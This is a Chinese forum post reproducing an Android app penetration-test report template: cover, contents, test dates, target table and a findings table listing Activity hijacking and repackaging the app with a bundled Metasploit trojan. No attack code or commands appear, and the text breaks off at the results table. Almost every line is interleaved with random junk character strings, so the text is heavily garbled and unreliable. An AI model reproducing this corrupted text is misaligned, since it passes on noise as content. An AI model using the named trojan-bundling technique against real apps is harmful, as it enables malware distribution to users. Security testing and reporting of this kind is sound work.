找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 4389|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
# t% t( H: G, v2 `+ w+ Z/ L7 \- W- d q: c) i3 x) W1 @

2 ~, e: U% ^2 K# x" P. T, G% v: f+ U! Q$ P- Q9 d
9 w& I# V. d. d/ G 7 H% T/ T& N: j, b

) a# G7 r7 @% x3 t 2 q) p/ ^% l" _. W
5 a G+ E) @1 ?" n( G$ u: c2 @$ f 9 D* M) G. x& t: T5 f

U# n6 \1 z g9 F, A" O4 x1 e. w( a6 c# u/ v) l 文档编号:                1 P# r! g7 ^5 e. p ) C) m4 V/ \* E- Q

0 `. O9 f: _. Y& N9 a % r8 E- `2 I0 d* |$ f% A) N; X' r f

" x, b& c. C4 M2 @& m( ^' x) ^- _ & f5 f$ X3 F. \$ E& N \. t   8 i% H2 D: A: _- A. H3 \ 9 [, H& y C" D+ z: j6 Y6 G6 `

/ I4 [$ J" B' ?6 l. C* f + u3 x+ }( s, \# l% @- J

s5 F8 V+ d$ i( U) K: V8 {2 U4 f& M" d% V/ g9 P/ E+ Z( Z5 ]   7 A3 z" [2 M5 a" N7 v7 f: b' r/ _/ U

3 ?! n5 ]+ j/ `; t( m # |" G7 G$ x$ X* J

% G& B: y b. G% z# A ! @8 K" ^: W0 ?& p/ G   % s& l% ?9 }/ J- n, o : i/ q' v) X" D# {* B

9 K; n* t5 S, J+ ^ ; D; r9 y' F! ^- [

; O2 c- o/ j7 R+ s J 6 [7 U n; D/ }8 X# |- K   2 o4 k" M' Z4 [: ^9 Y. h: }3 A# z / @1 E" z, h+ }7 T% D

: r: c$ k, I2 c- J! z' z 9 n" b8 G: J2 c' j2 u! f) l* l

/ k$ C' _- G: [% u* f ( E2 D: G) w" L. k1 |   + n3 {, m/ c4 w7 U6 b & N& K& e) F' x

1 Q: }6 X' Y5 R ~2 V5 _ ! f) ^& ~3 z1 t4 R) L1 N; j$ d

! v. `0 H9 `% r' e- i$ E ! h$ S8 U4 f: q( S' {# O6 p, \! q 某某某APP渗透测试 ( ^, u, K" J) Q7 e( M/ k 5 U4 k& S# _% w5 L! C" l; V

g& S+ w- a2 h5 B0 Z 6 K# }6 _* _) I( s& U

" B; y$ C2 _+ ?, @9 B7 J! \1 [- o) i0 v w   ( B ~( m) }7 N$ G1 ~- ^( H # R! d# `' e) n4 W' G# ^

) M/ `; R. r- O; I : H" ~ _, n4 i$ r, X. o

w7 V0 C! e9 A9 y4 g 2 |8 C, w/ ^# j2 }1 ^6 B9 M   9 D4 B. _ _3 ]' Y$ k' @& b/ n / t- Q4 G, X' U" J5 H

- W) v! p1 w: _ s 3 {2 Y8 H2 i% R& C- Y3 ^* |

' Q: }5 d* ^ F3 M , J! L3 @) g" B/ T1 S' ~2 D: K# U   # G8 c( n, W. l$ W 4 h! _# Y0 D* z' A+ f# {* `

. q6 _8 @7 L; s' i( l & P( }/ a6 |3 T7 X

* a, {: F+ q* w# \$ e! n / B0 Z8 O& F; V5 i4 Z   + g9 ]! D1 i# u1 E& }2 f $ ~. ^& ~1 m* v# c2 @& d$ ~* |( K

5 C+ J; i& Q1 U4 V1 m; e ; B/ b4 i: C8 T7 L/ w: I/ E. Q

8 W2 v" V2 ]2 ~, x$ T' {# Z- F [) W8 o& `$ Z* X% K* _ 技 术 报 告 3 G7 i0 J; |$ } 8 k' k4 m: I$ n) L5 o# c1 ]$ a$ f

/ h; z9 w; i, f! C+ _& X9 \: | # o+ Z6 x& T/ \9 a+ Q# l! a

& c6 `2 X( ]; R ~ ) m$ s9 V' m0 L; Q# E   0 u" A6 I( r* K * f6 ] `1 }6 r

. ~* d7 Y% f' z% G* {; u4 N a3 c/ P9 z2 ]0 n( c

( v/ ^ M9 q3 ?% V' P" s7 q ( l- h s: X2 l; l7 p8 y$ B# l2 |   & s" g, Y1 H. t/ x; D 9 L, V: c0 B# W2 r5 g5 J

" Y+ b7 d' G" `- \ 2 J$ K- _) ]- H( [# A4 ]

* K! `% D- V' U- ^8 Y5 Y1 Y w" _, C! c5 v/ b& Y* y   9 V+ e; ?. l. N* [ 3 a2 m& v) { I& @

; ]1 a3 E$ U# o" d3 P+ h4 ~; `4 _. Y3 |/ a ~1 M

2 L. J6 D7 q* W. W: t( H; C$ Z. ]$ p: K" ?   $ U0 T) C9 }3 ]/ I& x$ G7 Y3 s1 X' M2 j; L5 L5 l

A$ t8 z6 F; r4 P3 y* D5 {: p # F1 N/ Q9 H% l) r' {

+ ?7 d6 q2 @. z / b6 R0 M( a. B) G" a$ M0 H   3 c0 F5 i' u' f, i ' W' O& ?% ^5 t' F: F7 w

7 W$ v( D+ M. s9 V- Q, l3 e 2 _9 E6 X7 k( ^! P0 r6 y8 I. O

3 y' a' [. m3 t# h; e6 E. ` ) d1 R2 b# P/ m _8 u+ x   0 D1 w5 `* U `0 I1 n$ W$ E' A* | ' A$ B- Q0 n# `* X8 p! n

5 C i: j9 b I, [$ P4 W- K2 k+ I4 [ D, _! Q9 Y" S& ^3 W

; z- s& `6 ~) i- B0 C/ ~7 K% e3 R/ M   5 l5 ^0 ?3 L1 M3 m7 ]6 o# R% f$ w1 T' i S! C9 {/ l7 i

5 j" q% }# f3 P* v0 W3 m5 [2 T 3 w3 |; O- H' P4 @ G) J$ T

: S! m5 r; Z' f6 t. z. ` 5 k8 s" [0 m. q" W- Z* N: F) s2 s( F   7 K% N* j7 q- v/ h/ @" F% Z9 H. H+ S- \

8 W3 M+ U8 ?: C t. `* s& I 7 \" s" n; P( t: ?) Q2 p

4 ]7 K7 `; V. G & ]& u* M+ v# L2 i/ m: B   + X& ]# J2 X2 J0 Z 0 q2 ^8 T5 ^$ ^& u5 _+ A5 L

2 d% V2 s2 k2 C) g4 D+ x 4 G _6 q; g: S+ x( h8 i; C

$ R: H! p/ Y) b) a& |: ]6 F4 w , @# v/ e; d. t: O) y/ k   / s* l1 Z7 M5 e6 V; j ( p" w$ t7 z; z! c3 O* R" d( k

8 P. D7 b0 a3 A) v* v . M4 T& D2 c7 u! S* T- P+ D; Y( ?5 J( r

5 ~% P3 w6 o3 e* w5 R0 c4 z' J+ S3 Y * B; V# Y% y) k! q   * ^( p: }5 U! V1 }% U4 z7 k. v0 {2 s, Z- B. S, I% T

& ^9 v6 Z, Q: U! w; B . z9 M9 w6 Y z: }2 g

, J m7 M, S- q7 ~# o ' y, C( w" a2 W- L   0 u ]( ~3 {. L, \ $ x" J2 z+ ~. C+ H. b

' c8 _) Z$ ]8 P: ? . R* Y( O6 k: C4 o( {2 w9 L

- p6 h' _% s( Y7 X- a! R7 A5 Q8 c- f: f& j   ) p: q0 n% E4 }% x: G; a; H6 t / K* c3 m0 I0 }& x

2 y H% B: }2 @# e4 l) z 4 T. \" n! k" ^- p

! ]0 B% f5 f9 K2 m7 k, R; }% N) ^) G3 Q* {# z   5 O& X3 {* H, I* O* W' t' A: X( \! [# m

! a" z7 f+ N. b. y% w9 S1 Q ' {/ _% B& o- k! f8 `

) r+ }& Q7 ~) x * ?! ?; M$ Z4 a6 e/ _   6 W0 b; k O1 h; u1 u o) l9 g/ L" Y

9 o8 l- L& U8 A) ?+ {2 U D$ g/ ~, c+ q6 w

, c- E( C8 J9 n+ Y$ }; q / J! g/ ~# v3 ], p# X; s   5 D! Q+ A: c+ B s$ I ) E$ O& j# h E, E% W

- x( T: m8 v1 t+ p # N, T( E/ m+ k7 c

, T2 s( A+ T# Z0 Y+ o. g$ l, i# a% ^! P8 P2 C5 H. P   $ m& `9 w( n! q* F! L6 s 7 H+ S# C% A8 E; `! h n! x

" M5 z" G; T- _9 P" Q. o2 o e+ A4 R2 ~9 c6 @6 S/ W

/ {! X: u- B w' {- ^7 V" x% \ ` G+ k& P2 x5 Y   6 k( x- o9 I6 O, S6 Y8 ?' T, k# x' `& D* V0 D2 y/ m n

) X W2 b: m3 Q. A/ k1 I) k 1 o- g. A# _0 R% g6 A2 g8 m' s; o

( r( q* z8 a: V7 }5 T ; R: S2 l. b* M. `: o 二〇二〇年 / i2 L7 a, K0 N5 A( s, l) i+ K6 X4 u$ T" z+ L

) p7 ], V3 ^' q3 s5 [7 I4 L& X2 Z; ]0 b0 J+ u$ h- [
4 B$ g, Z: @& |- x' | " C6 O/ T( Y: q
7 Z- i8 h$ P6 E0 m& b. F- m, U " S6 t n4 U. U& p' [ * H7 m* Y4 k9 P% [+ m1 h6 f0 r6 C- c8 k0 V
5 D. b; z5 H+ J2 E# H! Q; N / v, k5 g- w! v
# h4 ?3 ]8 b" a+ c' y' z8 t* V8 D1 g# @6 M; g+ h/ V ^
, Y f% ?: ?: w 7 V# a0 {* J- V( X 7 s4 X( f; i1 \+ w6 ?5 G 4 Y( z& d1 E) Q( ^: _. s; t
2 c" u7 f/ ~4 w, @4 h9 g ' p$ r _' e0 N5 Q6 F

3 Y6 r, R1 }4 H# x A7 D 9 y& L* L% a) } 目 录 + `; I/ |5 d q% Z7 ?' x0 c1 C& l) a$ |6 h! @/ U+ c

O$ c! w% ]4 T1 T" ~2 z 1 z9 ?/ ~3 ~1 S5 \9 y0 v3 Q* x 9 V" |( H. o, t( M' Q% a & R1 m9 W" N' @( m

% y: `( h! P$ V |' U ) F" G& ~- _; ^% I   5 o; I7 r0 G: f% _* A% Z 8 g4 E {: I: u+ \) F2 P: n" Z

& B9 J; g2 J1 [0 a- H' d, f / f1 K7 `; I( O- ~! ]; G

) |, u! t0 m) s) r' X3 t0 T: @% p $ g% i: L- X) P- q7 }. T Q 1 概述... 3 ( u8 Y. p p+ f9 z2 r( D0 D3 U }5 o l% c: o! d( l' U3 R

- g3 I+ ^; ^0 y0 w' c. Y# i ( j5 n& S; W( |, w) e. ]# K

! U2 H3 h- a0 h, } + F8 m$ H& {. x( X! u 1.2测试时间... 3 5 ]% B3 ^' V, k7 I) L/ L) c! B7 ]- V& f7 P7 s

- d9 X" i, s6 k3 G , a( _1 `( D! p9 I: n

6 T/ e/ t0 ~8 \3 M9 m % H1 G8 r$ z# _, L, A# a 1.3测试对象... 3 8 K# \! s' `0 T' H4 L, t7 ?2 k $ c* f$ Q1 {4 }8 F

& B* `1 J9 y6 D! G1 ~: ?, M , M9 ]5 W9 G, o0 T; Z, C3 \

7 _$ Y) p; |" `+ v' \# e( w/ {4 ]( q8 M; Y$ G 1.4测试结果... 3 2 E2 Q0 e- c( X7 `( t& O) k; O ' |0 g- R5 I& h- N: k' n/ b

( z/ h5 P8 s/ h4 Z ' l0 j3 U y* g' X1 K/ {# v4 G9 V

' i; l) F# q+ Q$ P& O9 l5 P, u# R- ]. g- e 2 检测结果... 4 0 Z" u# Y6 b2 R- E , x" d% } Z! s1 a1 z

4 T8 s7 Y$ ]5 e* x1 i0 } : ?: q* l: o8 s$ F

) Z' k! J6 Z9 W; S & g; P1 E: k5 o5 v 2.1 某某某... 4 . ^9 v8 l$ J, ^3 s& d( d0 R7 y. S2 m # Y. {+ i6 ]! P3 f" F$ \1 h2 \% H. I

; B, [ k" n# A3 s$ j% E- k4 `5 `

* T- [) W- ~% l; ^( v & m4 m! ~% Q4 a3 y 2.1.1检测目标... 4 0 @, ?: B% K* j, N; Z8 l9 z/ ^+ t) v+ o! m$ ?2 j0 Y" e; w( F. V

$ c% g: k! ?: W) w1 n/ R6 } ' P4 E, E% |, x. B& c9 l

, P6 R6 p: ?+ v5 O5 w ' a1 G3 e+ D: b. J! V5 g3 | 2.1.2检测结果... 4 8 v* r4 \* |% i 5 i; A: C+ Q$ U1 e: x

( v5 G3 b( j, Z2 [ \. r$ G! o( _* _8 J4 W$ F* U) ]3 h

% b+ c% ]) w- Z2 @8 g 4 P4 z4 e! r; ^" s 2.1.2.1. 4 $ g6 `) Z7 i2 s) | m7 W 0 Q+ n& k+ U' V5 p0 Q( h( ]% M0 C

: W" n6 r- ?( F ; S' t; @0 U# u t! V/ P

# ]: k$ Q% A, m % |* _6 p$ v8 `- Z 2.1.2.2. 6 . {* d3 {) ]/ a" h0 u3 v6 U4 J0 B$ a" }+ O+ U# K* y

( b( h, \5 P- m( M1 q# h) j( Y1 a4 S( T8 o9 j

7 I7 ]- n: P5 p; i 4 k7 l3 _0 l+ _ & h* f- Q! f# q 8 B/ c5 V0 v M

2 I9 t" c. d) p, Y + g$ r( F4 W+ w; t U/ Q* O7 } {; O S' s6 c2 V' y! Z . H) m/ \- U z; P
( e* o4 S# h) [2 ?$ n6 P3 U ) k& l1 R' F7 i2 Y: E' Q% O' `
3 J# y$ l& D8 U/ y. _ j: M% d h, l- @( N; J* C' |; c ' m* n/ E. U# ^! U4 r' n 2 }; [- o% d; J, m ]; `. a

5 _% u9 Y2 `3 N9 k6 j% T/ d1 O 2 V7 ] d r9 d% y# W 1 概述 m# E( |, @6 `! v( M7 q0 V$ D7 r / Y5 ?+ K% }& t" W2 U

2 [- O! t4 v) N( r! I% { 3 k' H# U$ M; e

- H) l' ^6 O/ _0 e3 W, J) s8 |) ~% o 1.2测试时间 ' l$ p" [& q1 M/ G6 n! F 0 K" Z, y# v G( Q+ Q& P

! c3 [& e) J. f% E2 n8 H5 o& H4 t- g5 q% p5 v 5 j4 p$ n% [4 @! z4 U5 m" ]1 O3 K7 E3 O# a" ? p- ^0 [( `0 h7 e: [3 A; `7 \% K# e8 l& d1 s6 j4 [9 V, W7 R. y4 m" `: L8 a* Z# l9 T/ u' y8 f, Z, m" ~& o: X! l; @. J7 g9 k, e& Z+ p! K8 L2 `! n1 h# ~3 }$ [0 f' y$ m/ J# T7 {: Z9 _2 Z9 |" x6 B* g0 W! K9 N5 B8 C+ D9 \& a* Q( V- M, a) L, m1 I( Z/ o* o% R$ D7 Z- x1 ]2 h# K9 P5 |, }- J& J1 d+ J6 ]+ h; m D: L) |# A! t! y- Z9 e" c$ @7 x# |+ ?2 H5 Q, H8 }; }2 Y* V; M7 j# n, V, i u: W/ v8 \) R5 [# Q. s. D/ w8 S' }6 k0 Y' Y3 K$ h* w/ I; j) @4 h2 x3 `! _ L6 {' u5 h( l& t- _+ ?8 G; h2 W- j, @; g( ^2 |0 ?% a; u" B, k2 p: K2 ?. f& _) E# p0 V" k7 o1 x3 P) q; k' r
1 g" h6 H! R$ E8 m. O % {7 Z1 M/ H5 D8 u3 y

5 s7 @% G% { c6 c$ q+ X: D" ~3 X3 ]# W* y0 g/ K0 @ 渗透测试时间 ; E _+ ?! h+ {! A& q3 Z: D: i! x5 u; i4 E. E! L7 @; j

) Y! @# _* y! G$ J1 W, t % b/ Q: I9 u" U" B
5 _. S m- O% R$ H, ]* V) W 3 x7 C- @) ?* A

$ O: e& b7 |$ w+ f8 R { @/ M% L$ a4 _' v8 Q 起始时间 4 r# V# ~' [5 s* Y) P5 m7 L 6 W9 G, r0 }: K$ p4 a

- M a3 U& V" G" L \& C$ t 5 `1 M, J$ {$ [1 y 		* Q$ h/ C3 E3 P2 l* U0 \ 3 J# Z. e' ^+ s( T& y. l

* o6 o; j K8 m* S" j8 h- t# e/ p( S' ]3 i4 q 202046 : o& `* B9 d2 g- n) b* T1 J7 s, Q Z5 y1 B5 u1 S

. v Q! e' e5 k; `% q5 I! a + P5 N' y9 z( ^' N5 ^! ?: y H
% p' B# n0 |3 _' S6 i4 G $ [+ H( p+ c: ]! O

, L* j$ T4 W& G: R6 R2 T ; ]* ?: E& z; x a% U) p- M* q& r 结束时间 . ?' D) c- B% n: \ : c4 @- g% X( _! o

) `0 p8 Y, D8 M* |% C @9 d, @, v6 v; \ 		m6 ~5 E. e, H0 O- R! e. L% I+ P L+ q) ~. F7 w# I2 E

6 n0 ~) u& }3 z0 Y; j( p ) A- b$ I0 x1 Q/ s( v 202049 8 N' p+ Q Q' X" b' g- j 1 j* N2 r: d! f- Q3 G- |1 u

( O2 d6 V2 T+ M% P 2 O" m; L2 z6 c* _; @& ~4 e
2 ~7 ]. o, Q. P8 o1 `+ J( g8 C9 g; y9 F/ T2 q9 Y

; j- [5 A$ j4 D4 K5 S6 Q) N) X " i7 d) [1 z$ [" z: l* P, \% _ 1.3测试对象 6 z" R9 q4 s' V ( J0 e. ?( w: z3 V/ l) J

# I) N+ z+ |' _ , u- J# J' t% `) L; N

- J6 H( I2 z: H& c & E" Y% i7 F% r) {: x8 }9 \% m9 F 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: " l" y% }8 ~; _* I3 t$ b* S( S e # @" p p9 U6 t! Z

+ E D3 G3 `6 c, i: | 8 m! d% T" q6 B: T! F" v/ b. R& J% w( M* Q

2 Q1 f. K) ^4 B' e. K 7 j0 a% M S; `- J0 Y$ A- f+ ~ 1-1 检测对象 # _& G9 d: r; M. b7 P 6 L- K+ _* A. G& ~

3 F5 I, A# o3 B6 i: f $ }9 J+ Q9 b) N2 T ? 5 D0 A# F7 Z& y3 ^8 ?' z) r6 ]# g. U2 b2 n" e" _" y/ q) F% Q! X4 ]6 ?5 k5 q# A' T7 i* V$ Q i& _, F% Y2 n: Z9 T L( ^8 }1 K! C7 w, v8 C1 C; {5 A7 R: \4 ?" \8 m0 w- Q, f: K7 s* g% i' S& k5 }7 R& z) v2 |' l S5 ^5 i, a* K+ B4 i' M4 Z3 `( g- w" i7 G' ?9 F) }9 w% T+ M" o. p. ^6 g. c1 `- j! r3 k" j0 X4 [# T% f8 t5 Z& D+ ]0 M' w b$ U' x$ U$ q) [8 x9 l$ r9 A4 z+ p" H1 s0 C1 F' s2 I( `2 D! ?2 l/ \ s7 p& z) K ]7 d# D+ a/ Z% t V% X0 ^3 c8 X; H( H9 r b. O- T# B3 C2 V$ f" n0 M" G a/ b& V, k9 I5 A. k" A* U6 L9 M6 @7 [7 z B, J3 D* l4 `" x( N; @0 g8 _( A& f+ t4 m+ A: f# o3 _' ]/ K0 l1 Z# ~; x8 p7 B0 S* q' S. ~1 y3 B- T! K# |! r9 t$ s+ L& \# \, O) V' f' z% w
x0 `; f# q6 E7 k9 b ! }* X8 O( {4 @! B- M

# e( O* l# s& N, n/ C( j" j" W 1 n' ~1 y& q- Y9 J' f J8 W 序号 9 S% e$ r3 {; D : v4 v0 i- a- E: N

8 M* e1 r$ ^. N& U , U( D6 V# M4 }- O 		/ b2 R5 P. `! ^6 s% j 9 ]* v/ ]) N: ~3 S! J. e/ Z8 K

Z- Y3 c3 ?* l2 l0 _6 ?# d$ ] # X3 \: R O* e5 N% Q+ K8 q: j! q. R 测试对象 9 w4 p+ V' A" h5 v( e& w + h2 Z9 a6 s$ m* ^* d+ y$ p

; _# Z/ P; l/ k: {+ p) n5 C; L e' o, c 		4 c5 Z w( T) ]3 z7 g5 N, N/ F - H4 Q5 H+ @5 n1 V

4 s0 A( E0 v5 w 8 C) ^- Q7 ]3 y% m" A+ z" H 测试地址 3 [8 |& m$ Y/ [+ U l1 p( { . z/ P* R! V- Q0 Y

9 {, U( M' K/ L. D h( x, K! b$ c % M T3 o+ d E {( W8 F8 |! p9 Z 		+ ?- [4 s0 `( y$ C* f $ C& B8 `. b3 i

9 C: I& h. V# q2 b ) H+ ~: ^: x8 v- j) `& ~5 F* Z: A 安全漏洞 5 t {6 o+ D* M6 }6 P* d7 e q : `' G! N: J# C/ I6 g

( W! {' Y4 s+ ]4 L- x( E+ W 5 p3 ?9 ~% K* y2 _% X# N
. B# v$ w* g# c2 v / w- @1 |* I7 _% S

4 f( m6 S* Q- O+ G ) G& W6 [$ X* l8 Y( Z/ T 1 / I8 n. A# C7 J* q4 k7 a $ o5 y& g7 ]. T- ?* _2 q2 Q: m) }

- s2 ^0 a+ c& r, e- P / q$ F- G. Q7 p2 S2 w 		# C2 j8 R6 R2 U; z 5 T1 R+ O( F7 v/ @% r

& a: {0 ]( ?* K7 e% A$ u8 l: V + |+ ?! p: ~6 |6 s0 O 某某某安卓APP + s: l/ E) ~! Q# ?1 `9 O+ `1 x( {' b! L. z) s! K% I3 e

5 G+ E3 w( w8 B7 } : D+ ~! Z I4 ^% h! h0 k 		! s5 i. ^. }/ [' W7 X% X ; g, U T( E. H* s; \

4 Q' F/ Z" N$ M# _, l( A( K# m / S8 _ U% y; S, c   % N n3 {- x5 P0 G9 Z! ^: h0 U& j m 1 b; @8 I) w0 Y. W% s

/ L$ \6 ~+ L' e # k- h' j- p1 g" H- S 		" y; w* o0 L+ K {% h4 p1 I/ u0 J* J( w1 P

5 T- N2 c) Y6 u" r- l N 8 J9 E2 u+ D( P4 d! E 2 - C# r+ b8 G& O# o+ l9 Y5 _ 0 q9 U7 ^4 K# P* n

9 U- S# A. Q3 h- e. m3 E2 J( e3 p" b' A# _/ N' b7 q
6 Y1 m( G8 ^0 ]# n( D+ V% q) J: o8 O1 u: M- d

4 S2 n, q2 C& G; ~' { 0 D: q, b% F4 H 1.4测试结果 9 H6 x5 Y5 Q( L! ^! E $ u/ `7 ]$ e6 f! [

0 A6 U% N: a5 s- ?3 A3 E6 z , V( y, N3 P1 n- Z4 q$ K

- }0 m4 I& c8 V# F6 q2 g , u7 a# T. Y9 K _7 r3 j+ {. u 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: ( E' c1 O& v6 O) t) D. ` # x5 V) k8 i5 X9 S3 T- m

6 ~5 R7 S( w9 N ; v% m+ i, L: t) ~1 R/ q0 t

" z- S, {' s- _* M" Y( y+ G0 P6 x; F+ I7 C J% d   6 b( q- P, w8 t3 Z9 l" ` $ B4 f0 f8 V6 \ v+ f& i6 h

5 Q3 k7 }% A2 G+ P $ T, P2 r, p- e/ b6 A8 M$ m0 t
( l3 X& ? [( Y 6 }& {7 E. C3 i . ?1 R4 C7 w1 `" |- j) b5 T( ?4 w7 D& N8 q# R8 ^7 u- K' b7 Y' {* O; U% G$ S" R9 `3 b# J4 R* O( [, q/ x' r0 S) l, b5 N* [7 G6 k7 d& |' F* c1 L* T% j, |+ H7 f& w: ?/ V @6 i' @ j/ N1 W. R( F1 Y2 x: {( Z, j: y& D; O- H) J8 w+ K9 l( N7 V+ O4 r/ |0 ^- y9 X( q# V( i2 f/ b; ^+ o8 I! d$ ~7 b$ y4 m4 M1 n, @7 a& V! j- x0 h( h) ?3 ?4 u Q1 I8 T7 D! n0 b+ C9 L+ w+ A) K5 E, r- c' m# a6 K0 F4 ^7 B `' {4 P/ P }. M1 F0 |2 [5 k7 l% v! |# f, y3 L7 }9 n, B+ A& P) | H! H+ L( L/ V. L# b6 Q/ T5 P" Z2 h! O1 j) ]8 c3 r: H p2 C Y4 i0 i- e2 z! s5 J/ ~, z; f2 r2 a3 D# m. u# v$ r( b8 N J; g- k/ I: J/ i- [: D- t; D% H$ |. K2 P! e' l4 {/ H; x9 W1 q+ b9 R. J2 w+ ~ d4 {0 E9 m" m9 r/ U! O3 u! a0 X" y' O9 I( w/ {4 E5 @. N {% n) O% [- K6 @: g! d% r5 U- C: I6 l H; t& j9 r9 u2 z6 S4 i" A6 V2 K% {5 H3 F4 @. b1 h8 x( E: i8 L: c; {( K' x$ H& e: |+ ^' ]: N' [ f6 u& Q+ K+ O# o: H% f' T" v" a6 x# H' m; X( i4 D; }& g' m# \4 Z0 q) k5 o/ H1 ]& k* C8 u0 E$ \0 K% ^/ P! ~7 R$ o1 x- A# J S9 }# G/ @+ P+ @: m9 o; F2 P8 q- ?: B, u" f% c5 ^# Q+ F) V7 y" x) P% a8 l* L# k. {2 _7 ?. V9 |, H3 u/ o8 G! s5 D$ w$ u3 s- m7 ~1 ?
# h, d7 V6 h+ R' f* K # o: R/ a+ ^1 V; V' P* T

7 V; X4 ~, X" P. J2 b9 ] & [7 P6 r9 O! u2 G8 G3 k 序号 # X5 Z6 ? \0 L& S/ u0 \8 Q$ m% l$ I9 E: f! v2 ]. U

. M" W, E( \" J3 x; ]! u% |0 \+ a* v- Q& i2 H% e$ f 		- K1 H7 E' c7 K- \ 3 r u! l3 D+ \; L% N- U* z* g

; o0 v2 h) @2 p* w 6 L0 l% q5 B; _0 y* \; n 系统名称 ( k" q& |& C# I# x0 x" P8 A1 F. i4 G* I' u" G4 P: { X/ [" @

8 U& @9 J# V& e* _* X w5 _3 X$ R* Z! a" G1 ?5 M 		% m1 I) i2 x$ _6 M) J. a ) Z% j, `+ @4 ^! J

q. [7 Z" a& @2 n2 V+ r; ?; }6 K" W$ f" s, E 漏洞名称 : X1 I# g- D! t7 ^- S 4 x/ f& T( K: I: |1 |9 f) e

8 k$ Q2 w5 V2 L/ B; { ( `9 K, H- s. p! N# T 		& r$ a( U ^5 C: m$ Z, }2 h ! N6 p4 _$ Q& K" l, C. [" R* B

4 o9 m* `/ R% d$ P' {3 O2 ^$ { l( M+ [. B4 c+ i9 g 漏洞危害 @; \5 o2 G* } 5 ?; M! n, @( [& c

7 i9 u& R& h D+ o 3 H( M* Z C0 l3 B 		' y7 k, ^4 r% u ; F5 K" @# z1 Y: Q3 g& |/ z+ ~) X

4 C; ~3 A" Z' N( F) W9 o4 `2 d7 f5 X6 k; _8 a, J4 ^4 Y) i: s& Q 修复结果 " c% K H' U9 y4 J( d8 r ]4 D( M ! ~! K3 x! J7 x- Q. t; v1 S

* _, O. m/ x- e$ `1 \& V$ z3 k9 N' ^/ x: |
% ^! Z* \% ~, {8 x- _! d 6 d' Q6 |% F6 ^1 k7 N

4 W4 t3 J6 U& x, t8 i! T - u1 d, i! S# u- R9 ]0 z. n 1 1 W8 }: ^$ E+ p, t, S/ S) g7 |" L, J1 S, X

$ Y+ i0 @/ w0 j6 g+ Q" n2 g/ s- a4 g% f( v4 e' h2 N+ A 		1 X. v, p/ p @! z 5 u" z9 [" a8 C4 ^' q( P' j( u- [

' q8 T5 \) w. k+ o; M , t4 A/ T5 U! q% \8 x, A" ~ 某某某某某某APP " p5 `9 Z/ n6 E $ ]* }/ ?$ k% K+ B( n6 o3 L1 B: u

4 W) B0 P% |/ X4 `% I$ W+ M- y0 `7 _* Q. o 		- O) P3 T' W6 j ) o! E I. {5 B0 K

$ y: Q! v: E- |8 `$ d / ?' e( K7 P9 w/ N Activity 劫持 # a; F, l5 |9 B0 T. H 4 \6 V$ U' z$ ?1 {: i" L1 K

( R6 I Z) d% J& q c: D( p* F$ v8 t# B* x ( i# G5 [. e* d! f6 b8 }

9 N$ `& O/ }: F* O$ C* a 4 O$ Z$ p9 H1 o4 G1 G( l& {9 E   6 c: s6 ]6 f2 |: x0 m, G! g! R! q

: L( q; U7 B4 q9 z) ~+ p6 D' M: A9 i% n0 {" x# { 		& w4 L; C- h0 q( e, p" R 1 C3 n" V/ R$ t- i: C

7 Y. g3 p7 N( N% x O. D6 d( S- t. z {: i- G0 R " ~! O& w9 m# J7 o9 _' d4 A9 N- C ; F6 F% h+ r) n5 e9 E

7 i1 @. |1 I8 Y% e# h6 w % d# w! E I/ O 		5 i% a; A$ o2 v1 T; i * v" Z. I0 ~7 R5 Y9 S

( q5 F7 g4 d4 u4 _ & \8 i/ y- D% V _' r6 L6 V7 F   6 l7 Q( {) y5 `1 Y2 G3 o4 \) ?" m4 `8 j# x, ~6 O0 C6 x

; M: Y& K; `& S$ V' p 9 r8 l" @8 e u7 H3 T' B
- I! B9 F) e3 ]4 M( U9 o7 P& u # R0 y: Z2 m$ X( Z

& j- f1 ?# N; _8 s& I9 g [! j0 K; ]) R& u 2 , i9 u; _) K% z; E- t+ j" q4 Z4 W2 m

6 t" G! M" ]" E% |" H$ N ' R: s+ Q* L" V# E3 P. P) `$ P 		1 q9 [4 I4 }# @* Z) ~( q. l3 B$ ] % a. \! G/ q% ^9 y* s& H- m

0 g9 W( }4 y) L% h* ], o1 N5 l* }) T3 v. z, t% B( ~+ u! C2 ] 某某某某某某APP , N% J7 Z k" X, B) d/ W' F0 b2 d; h1 g6 s" J. ^% M

; c& C' o) Q1 j 3 y; X5 V! \" F0 h) E4 H 		' D M5 Z" n- L0 } 7 L; D: v# g. `& ^5 o7 ^, H. l

: g O6 b! g* S ( A0 c8 r8 p1 b( ~+ h) Z: l; `( D' v 反编译二次打包捆绑木马、篡改APP代码 6 q/ P3 ~7 h" ?# a3 z1 z. C! @6 m# H0 o; q3 S8 y1 m: Y. B* h. m1 ?

8 K8 N' _8 E; Y) G0 ~/ T; ?/ g2 x 		# _- ]6 K9 i, e1 i 2 j: }' H' E% c" d! C, b6 i: [& |

0 A; M9 f Y, d5 p8 X) A C/ f- S ( j* v. s1 c* j/ M6 ^' K5 W' g " S' G% A" x! n7 y * n* E. a3 y+ C1 t) v4 N

8 O \& L( v1 t* |2 w) j' B- p . U6 O$ @4 s! m. ` 		' E e3 a3 T; e" V) ]) h6 | + \: d0 P8 ?6 ?. W3 v' R

( Y/ w% r- {& ]: E / c c7 {/ x6 G' f K) f   7 @7 d' |1 {* d9 O' ^5 Z) l) p. u - G( @+ J. Y0 t2 W' Z, G

! |( Y8 ^ z8 Q1 X5 f % _% @1 T) e0 P. S9 n1 {
9 v x' z; }6 h! X* r ' O3 ^5 w% q" r* Z0 C5 ^
K$ E: X) s# ^ % a7 ]4 R& v" W

* ]( |% ?+ _& J$ ^# E! z6 i W" z ; }; D b0 w' y- ^/ o# ] q+ Z   * D# o' r. U" U9 D" d/ y Y. d* @) j5 L

6 z+ e4 O* s. a( r* p' l 2 z$ r- m4 C: g$ S1 H0 t

) N$ O0 C6 H" j/ L 5 O' b' v' T% G* R; O' E 1-2 测试结果 . o. @+ ^+ W7 K! A$ } $ S" B+ q" M7 p/ P2 S! e

